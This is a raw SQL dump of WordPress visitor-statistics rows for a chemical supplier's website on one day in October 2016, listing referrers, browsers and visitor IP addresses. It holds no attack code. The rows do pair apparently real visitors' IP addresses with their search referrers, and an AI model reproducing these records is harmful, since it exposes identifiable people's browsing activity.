INSERT INTO `wp_statistics_visitor` VALUES (1326, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjDovSR-cjPAhUC7R4KHXyPCCUQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.134495766,d.dmo', 'MSIE', 'Windows', '11.0', '', '141.189.251.16', '000', 31, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1327, '2016-10-07', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '207.215.49.2', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1328, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '96.80.255.1', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1329, '2016-10-07', 'https://www.motor-talk.de/forum/pflegetipps-dach-t1578134.html?page=3', 'Firefox', 'Windows', '49.0', '', '185.22.140.172', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1330, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1331, '2016-10-07', 'https://www.miller-stephenson.com/product/ms-111-epoxy-stripping-agent/', 'MSIE', 'Windows', '9.0', '', '204.79.180.172', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1332, '2016-10-07', 'https://heatpower.ru/', 'MSIE', 'Windows', '6.0', '', '46.118.155.22', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1333, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1334, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1335, '2016-10-07', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '204.79.180.189', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1336, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '70.164.112.50', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1337, '2016-10-07', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.1.50', '', '79.68.82.221', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1338, '2016-10-07', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '47.0', '', '70.164.112.50', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1339, '2016-10-07', 'https://www.miller-stephenson.com/contact_re-nu/', 'MSIE', 'Windows', '8.0', '', '62.24.222.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1340, '2016-10-07', 'https://www.miller-stephenson.com', 'Microsoft', 'Unknown', 'Unknown', '', '166.248.127.238', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1341, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '166.248.127.238', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1342, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '166.248.127.238', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1343, '2016-10-07', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '67.191.113.183', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1344, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwih8snq_sjPAhVFHGMKHYxXBPcQFgghMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FCuring%2520Agent.pdf&usg=AFQjCNHxwVqX5A1fMEHEn-MeptfpRg-BrQ&bvm=bv.134495766,d.cGc', 'MSIE', 'Windows', '11.0', '', '12.46.32.7', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1345, '2016-10-07', 'https://www.miller-stephenson.com/product/vazo-88/', 'MSIE', 'Windows', '11.0', '', '206.167.137.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1346, '2016-10-07', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwiRlqKp_8jPAhVC5oMKHQ-oAmMQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135258522,d.amc', 'MSIE', 'Windows', '11.0', '', '184.149.7.158', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1347, '2016-10-07', 'https://www.bing.com/search?q=epon+815&qs=n&form=QBRE&pq=epon+815&sc=8-8&sp=-1&sk=&cvid=27B92CC007564A93A83A0ABC156E1F5B&adlt=strict', 'MSIE', 'Windows', '11.0', '', '192.249.47.208', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1348, '2016-10-07', 'https://www.google.co.uk/url?sa=t&source=web&cd=1', 'Chrome', 'Linux', '46.0.2490.80', '', '88.198.91.115', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1349, '2016-10-07', 'https://www.miller-stephenson.com', 'python-requests', 'Unknown', '2.7.0', '', '185.129.148.216', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1350, '2016-10-07', 'https://www.google.ch/', 'Safari', 'iPad', '10.0', '', '203.116.40.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1351, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '76.118.50.151', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1352, '2016-10-07', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '107.200.137.90', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1353, '2016-10-07', 'https://duckduckgo.com', 'Firefox', 'Windows', '47.0', '', '184.69.10.114', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1354, '2016-10-07', 'https://www.google.com.bz/', 'Chrome', 'Windows', '53.0.2785.143', '', '190.197.47.114', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1355, '2016-10-07', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.153.125.213', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1356, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.31.242.194', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1357, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '192.249.47.207', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1358, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1359, '2016-10-07', 'https://www.miller-stephenson.com/product/143ac/', 'Chrome', 'Windows', '53.0.2785.116', '', '201.156.184.225', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1360, '2016-10-07', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '8.0', '', '52.71.155.178', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1361, '2016-10-07', 'https://www.miller-stephenson.com/miller/conformal_coating.html', 'Chrome', 'Windows', '49.0.2623.112', '', '207.91.154.154', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1362, '2016-10-07', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '70.90.121.249', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1363, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.44', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1364, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.3', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1365, '2016-10-07', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '204.79.180.34', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1366, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0ahUKEwiXxtqzh8nPAhUGWz4KHQ61BDMQFghhMAc&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q', 'MSIE', 'Windows', '11.0', '', '50.254.175.17', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1367, '2016-10-07', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '80.187.99.162', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1368, '2016-10-07', 'https://www.miller-stephenson.com', 'Safari', 'Unknown', '602.1', '', '80.187.99.162', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1369, '2016-10-07', 'https://www.google.com', 'Firefox', 'Windows', '31.0', '', '52.11.173.13', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1370, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.165', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1371, '2016-10-07', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '45.0', '', '134.253.203.39', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1372, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1373, '2016-10-07', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwia1qeVi8nPAhVGbH4KHajsBpgYABAF&sig=AOD64_0FFRv5dXT1bM86Iiu1iVia_NMGNw&rct=j&q=&ved=0ahUKEwicu5-Vi8nPAhVHyWMKHWCXAIkQ0QwIKg&adurl=', 'MSIE', 'Windows', '11.0', '', '66.183.182.62', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1374, '2016-10-07', 'https://www.google.com/aclk?sa=L&ai=DChcSEwju5fu_jcnPAhUQa34KHU-IDrwYABAA&sig=AOD64_3K2W6OVMmiCFlarf-tsiviJRRWPA&rct=j&q=&ved=0ahUKEwja5_a_jcnPAhVM0WMKHWIGBoQQ0QwIHA&adurl=', 'MSIE', 'Windows', '11.0', '', '12.252.212.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1375, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '41.75.84.206', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1376, '2016-10-07', 'https://www.bing.com/search?q=miller+stephenson+chemical+msds&form=PRLNC1&src=IE11TR&pc=LCTE', 'MSIE', 'Windows', '11.0', '', '98.159.211.79', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1377, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.177', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1378, '2016-10-07', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'Windows', '537.36', '', '125.209.235.172', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1379, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '67.53.11.66', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1380, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '192.249.47.201', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1381, '2016-10-07', 'https://www.miller-stephenson.com', 'Microsoft', 'Unknown', 'Unknown', '', '189.176.211.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1382, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '189.176.211.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1383, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '189.176.211.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1384, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.147', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1385, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '24.63.154.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1386, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiakLrMkcnPAhUfHGMKHe5lB2IQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-465C%2C%2520467C.pdf&usg=AFQjCNHpxX_N4Wruvkyfxzg29txP23tlxg&bvm=bv.134495766,d.cGc', 'MSIE', 'Windows', '11.0', '', '4.34.94.123', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1387, '2016-10-07', 'https://mschem.com/miller/connector_lubricants.html', 'Firefox', 'Linux', '47.0', '', '138.201.53.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1388, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '101.201.211.145', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1389, '2016-10-07', 'https://www.miller-stephenson.com/[site_url]/terms-conditions', 'MSIE', 'Windows', '9.0', '', '182.118.21.213', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1390, '2016-10-07', 'https://www.miller-stephenson.com/[site_url]/terms-conditions', 'MSIE', 'Windows', '9.0', '', '182.118.21.217', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1391, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.199', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1392, '2016-10-07', 'https://www.bing.com/search?q=vazo%2064&qs=n&form=QBRE&pq=vazo%2064&sc=8-7&sp=-1&sk=&cvid=D5E478B3D87240548A917FA0E6C6A33F', 'MSIE', 'Windows', '11.0', '', '74.117.16.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1393, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '47.89.47.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1394, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '45.55.135.224', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1395, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '36.250.69.109', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1396, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwiZ0em-l8nPAhVGFJQKHf4vBocQFghXMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-lvp%2F&usg=AFQjCNF3scNn5G2Wg2avAd6a3iXDV5IvVQ&sig2=gGy1MI25e6b_-Ogrbw1p9Q&bvm=bv.135258522,d.dGo', 'MSIE', 'Windows', '11.0', '', '198.175.253.81', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1397, '2016-10-07', 'https://www.google.com', 'Firefox', 'Windows', '47.0', '', '72.45.207.106', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1398, '2016-10-07', 'https://www.google.lv/', 'Chrome', 'Windows', '53.0.2785.143', '', '89.201.94.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1399, '2016-10-07', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '2.0.0.6', '', '107.170.107.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1400, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '211.170.68.106', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1401, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '218.59.187.33', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1402, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '211.75.255.37', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1403, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '49.81.85.51', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1404, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '75.141.44.14', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1405, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwio2pnAncnPAhWFl5QKHR0lDLUQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135258522,d.dGo', 'MSIE', 'Windows', '11.0', '', '24.176.221.66', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1406, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1407, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '73.154.30.98', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1408, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.53', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1409, '2016-10-07', 'https://www.miller-stephenson.com/chemicals/epoxy-resin-systems/epon-epoxy/modified-liquid-epoxy-resins/', 'MSIE', 'Windows', '9.0', '', '204.79.180.57', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1410, '2016-10-07', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '10.100.103.1', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1411, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '52.0.2743.116', '', '129.179.0.228', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1412, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '216.244.82.83', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1413, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '64.33.177.139', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1414, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.50', '', '170.72.5.55', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1415, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '64.73.228.250', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1416, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '211.170.68.98', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1417, '2016-10-07', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1202.XkQ1O1neIleqRMNEAsQ2vP3TqcvRLWms4WkaAPrrsHMDqGky0COO5xuyYVLHyJnN.1ca979bfdc9e4a47dcb3c2e976ce45ce7f228e4c&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YD4hgzqAYr5iuWBiLZQy-rY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhXQkktSlF5d0NvOWJFcXJBLTUzLUdoNllPMWN3QmkwTUhaR3FpOThISXRUb2hvdEpvbWY2V1JheHNqQVg3RklVdHI2TmNTM3hPa1poZVlyZTMwS2t1bw&b64e=2&sign=12ca7551c73838109677966cabb69c69&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96FiMuxkhb2BTkuwUpd12VwT9BfrEeBUUf_s7gyE1Q2iSpLyix3oBf-qmYpt-gFJI3Oqgfn1L3MWcizgH8TnAJXQ_xDYu_TTi1BeRHTg28YJLUKZ8duiq9yJQNTVJnbUden&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXdCnh-_wii4Tf2QRZ-YUyGwImv220XZD9suSR5jAR--QtEtxH1oe4eber8ZYm75Ya3kzQ0uB6SdtLd6CsTk-_YwFmcmGtGI9U&l10n=ru&cts=1475862998479&mc=6.77516830924', 'Firefox', 'Windows', '25.0', '', '128.72.114.115', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1418, '2016-10-07', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '24.39.119.102', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1419, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.140', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1420, '2016-10-07', 'https://www.google.com/', 'Firefox', 'Macintosh', '48.0', '', '128.252.7.77', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1421, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '175.44.14.253', '000', 43, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1422, '2016-10-07', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '207.229.56.230', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1423, '2016-10-07', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '211.170.68.92', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1424, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.199.83.170', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1425, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '72.45.165.98', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1426, '2016-10-07', 'https://www.bing.com/search?q=miller-stephenson+chemical+co&src=IE-SearchBox&FORM=IENTTR&conversationid=', 'MSIE', 'Windows', '11.0', '', '47.16.125.232', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1427, '2016-10-07', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '70.95.28.121', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1428, '2016-10-07', 'android-app://com.google.android.googlequicksearchbox/httpss/www.google.com', 'Chrome', 'Android', '53.0.2785.124', '', '172.56.41.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1429, '2016-10-07', 'https://www.google.ca/', 'Safari', 'iPhone', '10.0', '', '151.68.47.140', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1430, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&sqi=2&ved=0ahUKEwjLvrbjqMnPAhVBWCwKHa_SCUEQFghuMAY&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-225%2F&usg=AFQjCNE5xJhq-AfIzlo1kRJjNg972YkdHg&bvm=bv.134495766,d.bGg', 'MSIE', 'Windows', '11.0', '', '192.104.67.222', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1431, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjvycqRqcnPAhVM54MKHTGXAegQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=2ieCYo0h_eletJ26Mh0luw&bvm=bv.135258522,d.amc', 'MSIE', 'Windows', '11.0', '', '146.6.208.11', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1432, '2016-10-07', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '64.183.73.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1433, '2016-10-07', 'https://www.miller-stephenson.com/', 'Opera', 'Android', '11.10', '', '91.193.239.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1434, '2016-10-07', 'https://www.miller-stephenson.com/', 'Opera', 'Macintosh', '10.00', '', '91.193.239.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1435, '2016-10-07', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.172', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1436, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '67.189.130.119', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1437, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.61', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1438, '2016-10-07', 'https://search.yahoo.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '72.35.175.57', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1439, '2016-10-07', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjzjszjrMnPAhXJ6SYKHZY5BAgQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-765%2C%2520767.pdf&usg=AFQjCNFpeL-7pEXcYtwq2k_WsbR3NXmR-g&bvm=bv.134495766,d.cWw', 'MSIE', 'Windows', '11.0', '', '99.252.202.243', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1440, '2016-10-07', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.40.174.208', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1441, '2016-10-07', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0ahUKEwjwyYGnr8nPAhVSET4KHYpoApgQFghJMAc&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fkrytox.html&usg=AFQjCNH0hXOp2FX5gVUfB-buW1gzcf4SHw&bvm=bv.134495766,d.cWw', 'MSIE', 'Windows', '11.0', '', '65.209.181.185', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1442, '2016-10-07', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '194.187.170.118', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1443, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '130.126.153.176', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1444, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '128.151.43.67', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1445, '2016-10-07', 'https://www.google.co.id/', 'Chrome', 'Windows', '53.0.2785.143', '', '202.80.214.214', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1446, '2016-10-07', 'https://www.bing.com/search?q=ms-122ad+sds&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '143.85.2.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1447, '2016-10-07', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '98.229.133.240', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1448, '2016-10-07', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjTzra4tcnPAhWJW34KHZWKCLUYABAB&sig=AOD64_2V9asj4oCHn12edoO9AWl34GH71w&rct=j&q=&ved=0ahUKEwiGnLO4tcnPAhVK8mMKHYLwBlcQ0QwIIw&adurl=', 'MSIE', 'Windows', '11.0', '', '50.58.234.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1449, '2016-10-07', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '107.0.202.3', '000', 26, 0); 
